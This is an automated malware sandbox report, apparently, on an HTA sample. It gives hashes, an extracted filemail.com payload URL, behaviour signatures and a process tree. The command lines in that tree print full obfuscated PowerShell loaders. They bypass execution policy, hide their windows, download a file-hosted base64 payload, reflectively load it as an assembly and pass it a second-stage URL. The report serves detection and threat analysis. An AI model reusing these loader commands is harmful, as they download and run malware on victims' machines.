Analysis
- max time kernel: 120s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 18-11-2024 15:54
Static task: static1
Behavioral task: behavioral1
- Sample: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
- Resource: win10v2004-20241007-en
General
- Target: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
- Size: 178KB
- MD5: 2d71e3e87e2ea2945dcc2571b74fdb43
- SHA1: a338df9a850b1c37528e1b517786285c216cf5e0
- SHA256: 0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
- SHA512: 8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab
- SSDEEP: 96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
Blocklisted process makes network request 3 IoCs
flow  pid   Process
4     2544  pOWeRShelL.exe
6     1848  powershell.exe
7     1848  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid   Process
848   powershell.exe
1848  powershell.exe
Evasion via Device Credential Deployment 2 IoCs
pid   Process
2544  pOWeRShelL.exe
1156  powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  pOWeRShelL.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe

description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid   Process
2544  pOWeRShelL.exe
1156  powershell.exe
848   powershell.exe
1848  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description              pid   Process
Token: SeDebugPrivilege  2544  pOWeRShelL.exe
Token: SeDebugPrivilege  1156  powershell.exe
Token: SeDebugPrivilege  848   powershell.exe
Token: SeDebugPrivilege  1848  powershell.exe
Suspicious use of WriteProcessMemory 28 IoCs
description                       pid   Process         procid_target
PID 2212 wrote to memory of 2544  2212  mshta.exe       30
PID 2212 wrote to memory of 2544  2212  mshta.exe       30
PID 2212 wrote to memory of 2544  2212  mshta.exe       30
PID 2212 wrote to memory of 2544  2212  mshta.exe       30
PID 2544 wrote to memory of 1156  2544  pOWeRShelL.exe  32
PID 2544 wrote to memory of 1156  2544  pOWeRShelL.exe  32
PID 2544 wrote to memory of 1156  2544  pOWeRShelL.exe  32
PID 2544 wrote to memory of 1156  2544  pOWeRShelL.exe  32
PID 2544 wrote to memory of 2860  2544  pOWeRShelL.exe  33
PID 2544 wrote to memory of 2860  2544  pOWeRShelL.exe  33
PID 2544 wrote to memory of 2860  2544  pOWeRShelL.exe  33
PID 2544 wrote to memory of 2860  2544  pOWeRShelL.exe  33
PID 2860 wrote to memory of 2640  2860  csc.exe         34
PID 2860 wrote to memory of 2640  2860  csc.exe         34
PID 2860 wrote to memory of 2640  2860  csc.exe         34
PID 2860 wrote to memory of 2640  2860  csc.exe         34
PID 2544 wrote to memory of 1780  2544  pOWeRShelL.exe  37
PID 2544 wrote to memory of 1780  2544  pOWeRShelL.exe  37
PID 2544 wrote to memory of 1780  2544  pOWeRShelL.exe  37
PID 2544 wrote to memory of 1780  2544  pOWeRShelL.exe  37
PID 1780 wrote to memory of 848   1780  WScript.exe     38
PID 1780 wrote to memory of 848   1780  WScript.exe     38
PID 1780 wrote to memory of 848   1780  WScript.exe     38
PID 1780 wrote to memory of 848   1780  WScript.exe     38
PID 848 wrote to memory of 1848   848   powershell.exe  40
PID 848 wrote to memory of 1848   848   powershell.exe  40
PID 848 wrote to memory of 1848   848   powershell.exe  40
PID 848 wrote to memory of 1848   848   powershell.exe  40
Processes
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2212
C:\Windows\SysWOW64\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe"C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hf47ivh_.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC987.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC986.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2640
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1780
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZ
kZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:848
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
- Filesize: 7KB
- MD5: 3bdc8db63e87f1212bf6193a326f694a
- SHA1: f590d4d4d40561dcc52f46407712f862a3680039
- SHA256: cb178a9ac3880bde97ceba1446e2a2ce08a4ef8749eabb846943278c9b6cd5b6
- SHA512: 0e3b7576bd965ea1509c160e4c0e4868b118add294b10422f59a4a72d91f6e59a65444332b47dd624a6e26d9b52c5943b91ffd89180dbd6a6c62278ac6fe4d82